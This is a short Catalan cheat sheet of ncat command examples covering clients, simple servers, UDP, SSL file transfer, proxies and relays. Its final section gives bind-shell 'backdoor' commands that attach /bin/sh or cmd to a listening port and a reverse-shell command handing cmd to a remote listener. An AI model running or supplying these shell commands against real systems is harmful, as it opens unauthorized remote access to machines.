Reading time: 2 – 3 minutes
- client TCP, en aquest cas HTTP
C:\client>ncat google.com 80 GET / HTTP/1.1
- client telnet:
C:\client>ncat -t 192.168.1.1 23
- simula un servidor TCP/HTTP molt simple:
C:\server>ncat -l 127.0.0.1 80 < stuff.txt C:\client>ncat localhost 80 C:\server>ncat -l --keep-open 80 < stuff.txt C:\client>ncat localhost 80
- servidor UDP:
C:\server>ncat -l 74 --udp C:\client>ncat --udp localhost 74 < stuff.txt
- es pot especificar el port i IP origen a usar:
C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1 C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1
- interconnecta clients, ‘proxy-tcp’
C:\server>ncat -l 74 C:\client1>ncat localhost 74 C:\client2>ncat localhost 74 C:\server>ncat -l 74 --broker C:\client1>ncat localhost 74 C:\client2>ncat localhost 74
- servidor de ‘chat’ molt simple
C:\server>ncat -l 74 --chat C:\client1>ncat localhost 74 C:\client2>ncat localhost 74
- client TCP+SSL:
C:\client>ncat gmail.google.com 443 --ssl GET / HTTP/1.1
- transmissió de fitxers via TCP+SSL:
C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe C:\client>ncat localhost 74 --ssl > out2.exe (ends self) C:\client>ncat --ssl -vvv -l > newfile C:\server>ncat -v --send-only --ssl localhost < ncat.exe (Good for getting around NAT)
- proxy molt simple:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl
- shell amb backdoor:
- Linux:
ncat -l 23 -e /bin/sh C:\server>ncat 192.168.159.128 23
- Windows:
C:\server>ncat -l 23 -e cmd ncat 192.168.159.129 23
- Reverse Shell (aka: Shovel Shell)
C:\server>ncat -l 74 C:\client>ncat 192.168.159.128 74 -e cmd
- netcat relay
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"